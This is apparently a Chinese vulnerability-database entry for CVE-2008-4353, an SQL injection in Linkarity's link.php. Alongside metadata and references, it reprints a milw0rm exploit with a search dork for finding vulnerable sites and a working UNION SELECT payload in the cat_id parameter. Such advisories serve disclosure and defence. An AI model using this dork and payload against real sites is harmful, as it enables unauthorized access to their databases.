Linkarity link.php SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116104 漏洞类型 SQL注入
发布时间 2008-09-13 更新时间 2008-09-30
CVE编号 CVE-2008-4353 CNNVD-ID CNNVD-200809-443
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/6455
https://www.securityfocus.com/bid/80940
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200809-443
|漏洞详情
Linkarity是一种低成本的收集反馈的解决方案。Linkarity的link.php中存在SQL注入漏洞。远程攻击者可以通过cat_id参数来执行任意SQL命令。
|漏洞EXP
================================================================================
  Linkarity (link.php) Remote SQL Injection Vulnerability   
================================================================================



Discovered By: Egypt Coder

home : WWW.Sec-Area.com

Mail: Egyptcoder@hotmail.com



Dork:  Powered by: Linkarityâ„¢


Exploit :

http://localhost/link.php?cat_id=-1+union+select+1,2,3,4,5,6,7,8,version(),version(),11,12,13,14,15,16,17,18



Greets : ProViDoR , rUnViruS, Error Code, H666p , Fear Master , Broken Security

# milw0rm.com [2008-09-13]
|受影响的产品
Linkarity Linkarity 0
|参考资料

来源:XF
名称:linkarity-link-sql-injection(45100)
链接:http://xforce.iss.net/xforce/xfdb/45100
来源:MILW0RM
名称:6455
链接:http://www.milw0rm.com/exploits/6455